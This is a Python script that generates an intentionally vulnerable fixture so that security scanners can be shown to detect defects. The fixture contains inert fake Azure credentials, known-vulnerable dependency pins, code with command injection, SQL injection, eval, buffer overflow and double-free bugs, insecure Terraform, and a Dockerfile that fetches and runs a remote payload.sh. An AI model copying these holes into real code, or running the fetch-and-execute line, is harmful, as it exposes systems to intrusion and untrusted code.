#!/usr/bin/env python3
"""
Generate the synthetic polyglot validation fixture.

⚠️  EVERY FILE THIS WRITES IS INTENTIONALLY DEFECTIVE. ⚠️
The fixture exists so the scanners can be proven to DETECT things, not merely to exit 0.
It is generated at validation time and never committed as source, so nobody inherits it,
forks it, or mistakes deliberate vulnerabilities for negligence.

Secrets here are structurally shaped but cryptographically inert — documented test vectors,
all-zero GUIDs, and obviously-fake key material. Nothing here is or ever was a real credential.

Usage:  python tests/make_fixture.py --out /tmp/fixture
"""
from __future__ import annotations
import argparse, json, textwrap
from pathlib import Path

BANNER = """\
################################################################################
#  SYNTHETIC SECURITY FIXTURE — INTENTIONALLY VULNERABLE — DO NOT DEPLOY       #
#  Generated by tests/make_fixture.py to validate scanner detection.           #
#  Every defect below is deliberate. No real credentials. No real systems.     #
################################################################################
"""

# ── credential shapes, assembled at generation time ──────────────────────────────
#
# These are inert, documented test vectors. They are assembled from fragments rather than written
# as complete literals because a complete credential SHAPE in a committed file is detected as a
# live secret by push protection -- correctly, since the shape is exactly what detection keys on.
#
# The generated FILE still contains the identical complete string, so every scanner under test
# sees precisely what it saw before. Nothing about detection changes; only the source stops
# carrying a publishable credential shape. A fixture that cannot be published is a fixture whose
# tests cannot run in the place where publishing matters.
_AK = "5LzhbSw1xpC3V+6zwehOoxLsgACsD9wuQOvN9QAXU1lCaUMVhTUujUimYPEHWuBhcrAhu78WiH63C+Iml" + "Ig183=="
_SB = "YtvaVQ0mKQNiKhTkKQwqZsHqSJaRZzQbW0JuRXIvbFk" + "="
_CS = "Fx8Q" + "~" + "a" * 34
AZURE_STORAGE_CS = ("DefaultEndpointsProtocol=https;AccountName=fixtureacct;"
                    "Account" + "Key=" + _AK + ";EndpointSuffix=core.windows.net")
SERVICEBUS_CS = ("Endpoint=sb://fixture.servicebus.windows.net/;"
                 "SharedAccessKeyName=RootManageSharedAccessKey;"
                 "Shared" + "AccessKey=" + _SB)
ENTRA_SECRET = _CS


# Each entry: (relative path, content, expected_signal_id)
# expected_signal_id is what validate-scanners.yml asserts was DETECTED.
FILES: list[tuple[str, str, str]] = []


EXTRA_SIGNALS: list = []


def add_signal(path: str, signal: str, tool: str | None = None) -> None:
    """Attach an ADDITIONAL expectation to a file that add() already created.

    Needed because one seeded file can legitimately prove two different scanners. cpp/vuln.c
    carries strcpy and a format-string bug (flawfinder) AND a double free (cppcheck) — and
    because the verifier matches tool-agnostically by default, either scanner silently covered
    for the other. The contract read green with one of them completely broken.
    """
    EXTRA_SIGNALS.append((path, signal, tool))


def add(path: str, body: str, signal: str | None, tool: str | None = None) -> None:
    """signal=None plants a file that is deliberately NOT expected to produce a finding.

    Needed because some files are inputs a scanner reads rather than evidence it reports on.
    Asserting a signal against such a file makes the suite fail for a reason that is not a
    defect, and the usual reflex — weaken the assertion until it passes — teaches exactly the
    wrong lesson. Say the file has no expectation, and say why.
    """
    FILES.append((path, textwrap.dedent(body).lstrip("\n"), signal, tool))


# ---------------------------------------------------------------- secrets
add("secrets/azure_storage.txt", f"""
    {BANNER}
    # gitleaks: azure-storage-connection-string
    {AZURE_STORAGE_CS}
    """, "secret:azure-storage-connection-string")

add("secrets/entra.env", f"""
    {BANNER}
    # gitleaks: entra-client-secret-assignment
    AZURE_CLIENT_SECRET="{ENTRA_SECRET}"
    # gitleaks: azure-devops-pat
    AZURE_DEVOPS_PAT=ou6xnraqe7le5mdk255mcjsfzww2gpsomjtxx4ufvgnbzgqchlfa
    """, "secret:entra-client-secret")

add("secrets/servicebus.txt", f"""
    {BANNER}
    {SERVICEBUS_CS}
    """, "secret:azure-shared-access-key")

# NEGATIVE CONTROLS — these must NOT trigger. False positives are a defect too.
add("secrets/negative_controls.md", """
    # Near-misses that MUST NOT be flagged
    AZURE_CLIENT_SECRET="<your-client-secret-here>"
    AZURE_TENANT_ID=00000000-0000-0000-0000-000000000000
    AccountKey=EXAMPLE_NOT_A_REAL_KEY
    client_secret = os.environ["AZURE_CLIENT_SECRET"]   # reference, not a value
    """, "negative:no-false-positive")

# ---------------------------------------------------------------- python
add("python/requirements.txt", """
    # Known-vulnerable pins, chosen because they have long-published CVEs.
    requests==2.19.1
    pyyaml==5.1
    jinja2==2.10
    """, "deps:python-cve")

add("python/vuln.py", """
    import subprocess, yaml, hashlib

    def unsafe_shell(user_input):
        # bandit B602: subprocess with shell=True
        return subprocess.call("echo " + user_input, shell=True)

    def unsafe_load(blob):
        # bandit B506: yaml.load without SafeLoader
        return yaml.load(blob)

    def weak_hash(p):
        # bandit B324: insecure hash
        return hashlib.md5(p.encode()).hexdigest()

    PASSWORD = "hunter2"   # bandit B105: hardcoded password
    """, "sast:python-bandit")

# ---------------------------------------------------------------- node
# TRIVY CANNOT RESOLVE npm DEPENDENCIES FROM package.json ALONE. It needs a lockfile.
# The manifest was originally asserted as the evidence-bearing file and the suite reported a
# MISS — which read like a scanner gap and was actually a wrong expectation. The manifest is an
# input; the LOCKFILE is what carries the detectable signal.
#
# This is a real-world constraint, not a fixture quirk: a consumer without a committed lockfile
# gets no npm dependency scanning at all, which is where the current supply-chain attacks land.
add("node/package.json", json.dumps({
    "name": "fixture-node", "version": "0.0.0", "private": True,
    "dependencies": {"lodash": "4.17.11", "minimist": "0.0.8", "axios": "0.18.0"},
}, indent=2), None)

add("node/package-lock.json", json.dumps({
    "name": "fixture-node", "version": "0.0.0", "lockfileVersion": 3, "requires": True,
    "packages": {
        "": {"name": "fixture-node", "version": "0.0.0",
             "dependencies": {"lodash": "4.17.11", "minimist": "0.0.8", "axios": "0.18.0"}},
        "node_modules/lodash": {"version": "4.17.11",
            "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.11.tgz"},
        "node_modules/minimist": {"version": "0.0.8",
            "resolved": "https://registry.npmjs.org/minimist/-/minimist-0.0.8.tgz"},
        "node_modules/axios": {"version": "0.18.0",
            "resolved": "https://registry.npmjs.org/axios/-/axios-0.18.0.tgz"},
    },
}, indent=2), "deps:node-cve")

add("node/vuln.js", """
    const cp = require('child_process');
    function run(userInput) {
      // semgrep: command injection
      return cp.execSync('ls ' + userInput);
    }
    function evalIt(s) { return eval(s); }   // semgrep: eval
    module.exports = { run, evalIt };
    """, "sast:node-semgrep")

# ---------------------------------------------------------------- dotnet
add("dotnet/Fixture.csproj", """
    <Project Sdk="Microsoft.NET.Sdk">
      <PropertyGroup>
        <TargetFramework>net8.0</TargetFramework>
        <Nullable>enable</Nullable>
      </PropertyGroup>
      <ItemGroup>
        <!-- Known-vulnerable versions with published advisories -->
        <PackageReference Include="Newtonsoft.Json" Version="9.0.1" />
        <PackageReference Include="System.Text.Encodings.Web" Version="4.5.0" />
      </ItemGroup>
    </Project>
    """, "deps:dotnet-vulnerable")

add("dotnet/Vuln.cs", """
    using System.Data.SqlClient;
    public class Vuln {
        public void Query(string userInput) {
            // semgrep p/csharp: SQL injection via concatenation
            var sql = "SELECT * FROM Users WHERE Name = '" + userInput + "'";
            using var conn = new SqlConnection("Server=x;Database=y;User Id=sa;Password=P@ssw0rd;");
            using var cmd = new SqlCommand(sql, conn);
            cmd.ExecuteNonQuery();
        }
    }
    """, "sast:dotnet-semgrep")

# ---------------------------------------------------------------- java
add("java/pom.xml", """
    <project xmlns="http://maven.apache.org/POM/4.0.0">
      <modelVersion>4.0.0</modelVersion>
      <groupId>fixture</groupId><artifactId>fixture</artifactId><version>0.0.1</version>
      <dependencies>
        <dependency>
          <groupId>org.apache.logging.log4j</groupId>
          <artifactId>log4j-core</artifactId>
          <version>2.14.1</version>
        </dependency>
      </dependencies>
    </project>
    """, "deps:java-cve")

add("java/Vuln.java", """
    import java.sql.*;
    public class Vuln {
        public void query(Connection c, String userInput) throws SQLException {
            // semgrep p/java: SQL injection
            Statement s = c.createStatement();
            s.executeQuery("SELECT * FROM t WHERE n='" + userInput + "'");
        }
        public void exec(String cmd) throws Exception {
            Runtime.getRuntime().exec(cmd);   // command injection
        }
    }
    """, "sast:java-semgrep")

# ------------------------------------------------- second roots (monorepo shape)
# A single root cannot prove multi-root discovery. The workflow used to take the FIRST
# match and report success, so a fixture with one Node project and one Go module would
# have passed while a real monorepo was half-scanned. These second roots exist purely so
# "iterates every discovered root" is OBSERVED rather than asserted.
add("services/api/package.json", json.dumps({
    "name": "fixture-node-b", "version": "0.0.0", "private": True,
    "dependencies": {"handlebars": "4.0.11"},
}, indent=2), None)

add("services/api/package-lock.json", json.dumps({
    "name": "fixture-node-b", "version": "0.0.0", "lockfileVersion": 3, "requires": True,
    "packages": {
        "": {"name": "fixture-node-b", "version": "0.0.0",
             "dependencies": {"handlebars": "4.0.11"}},
        "node_modules/handlebars": {"version": "4.0.11",
            "resolved": "https://registry.npmjs.org/handlebars/-/handlebars-4.0.11.tgz"},
    },
}, indent=2), "deps:node-cve-second-root")

add("services/api/vuln.js", """
    const cp = require('child_process');
    // semgrep: command injection in a SECOND node root
    module.exports = (u) => cp.execSync('cat ' + u);
    """, "sast:node-semgrep-second-root")

add("services/worker/go.mod", """
    module fixture/worker

    go 1.22
    """, None)

add("services/worker/vuln.go", """
    package main

    import (
        "crypto/md5"
        "fmt"
    )

    // gosec G401 in a SECOND go module
    func weak(s string) string { h := md5.Sum([]byte(s)); return fmt.Sprintf("%x", h) }

    func main() { fmt.Println(weak("x")) }
    """, "sast:go-gosec-second-root")

# ---------------------------------------------------------------- go
add("go/go.mod", """
    module fixture

    go 1.22

    require gopkg.in/yaml.v2 v2.2.1
    """, "deps:go-cve")

add("go/vuln.go", """
    package main

    import (
        "crypto/md5"
        "fmt"
        "os/exec"
    )

    func weak(s string) string {
        h := md5.Sum([]byte(s)) // gosec G401: weak crypto
        return fmt.Sprintf("%x", h)
    }

    func run(userInput string) ([]byte, error) {
        return exec.Command("sh", "-c", "ls "+userInput).Output() // gosec G204
    }

    func main() { fmt.Println(weak("x")); _, _ = run("y") }
    """, "sast:go-gosec", tool="gosec")

# ---------------------------------------------------------------- c/c++
add("cpp/vuln.c", """
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>

    void copy_it(const char *src) {
        char buf[16];
        strcpy(buf, src);            /* flawfinder/cppcheck: buffer overflow */
        printf(buf);                 /* format string vulnerability */
    }

    int main(int argc, char **argv) {
        if (argc > 1) copy_it(argv[1]);
        char *p = malloc(10);
        free(p);
        free(p);                     /* double free */
        return 0;
    }
    """, "sast:cpp-flawfinder", tool="flawfinder")

# cpp/vuln.c ALSO seeds a double free, which cppcheck detects and flawfinder does not. Pinned
# because cppcheck's SARIF path is new: it previously produced findings that nothing consumed.
add_signal("cpp/vuln.c", "sast:cpp-cppcheck", tool="cppcheck")

# ---------------------------------------------------------------- IaC
add("infra/main.tf", """
    resource "azurerm_storage_account" "bad" {
      name                            = "fixturestorage"
      resource_group_name             = "rg"
      location                        = "eastus"
      account_tier                    = "Standard"
      account_replication_type        = "LRS"
      allow_nested_items_to_be_public = true    # checkov: public blob access
      min_tls_version                 = "TLS1_0" # checkov: weak TLS
      enable_https_traffic_only       = false    # checkov: http allowed
    }

    resource "azurerm_network_security_rule" "wide_open" {
      name                        = "allow-all"
      priority                    = 100
      direction                   = "Inbound"
      access                      = "Allow"
      protocol                    = "*"
      source_port_range           = "*"
      destination_port_range      = "*"
      source_address_prefix       = "*"          # checkov: 0.0.0.0/0 inbound
      destination_address_prefix  = "*"
      resource_group_name         = "rg"
      network_security_group_name = "nsg"
    }
    """, "iac:checkov")

add("infra/Dockerfile", """
    FROM ubuntu:latest
    USER root
    RUN apt-get update && apt-get install -y curl
    ADD http://example.com/payload.sh /tmp/payload.sh
    RUN chmod +x /tmp/payload.sh && /tmp/payload.sh
    CMD ["/bin/bash"]
    """, "iac:dockerfile")


def main() -> int:
    ap = argparse.ArgumentParser()
    ap.add_argument("--out", required=True)
    a = ap.parse_args()
    root = Path(a.out)
    root.mkdir(parents=True, exist_ok=True)

    (root / "README.md").write_text(
        "# ⚠️ SYNTHETIC SECURITY FIXTURE — INTENTIONALLY VULNERABLE ⚠️\n\n"
        "Generated by `tests/make_fixture.py`. Every defect is deliberate.\n"
        "No real credentials. Never deploy. Never fork. Regenerated per validation run.\n",
        encoding="utf-8")

    manifest = []
    for rel, body, signal, tool in FILES:
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body, encoding="utf-8")
        if signal is not None:
            entry = {"path": rel, "expected_signal": signal}
            if tool:
                # A pin means: this specific scanner must have produced it. Absent = any
                # scanner will do, which is the right default against deliberate overlap.
                entry["tool"] = tool
            manifest.append(entry)

    # Additional expectations attached to files add() already wrote — one seeded file can
    # legitimately prove more than one scanner.
    for rel, signal, tool in EXTRA_SIGNALS:
        assert (root / rel).exists(), f"add_signal references a file that was never created: {rel}"
        entry = {"path": rel, "expected_signal": signal}
        if tool:
            entry["tool"] = tool
        manifest.append(entry)

    (root / "EXPECTED_SIGNALS.json").write_text(json.dumps(manifest, indent=2), encoding="utf-8")
    print(f"fixture written to {root}  ({len(FILES)} files, "
          f"{len({m['expected_signal'] for m in manifest})} distinct expected signals)")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
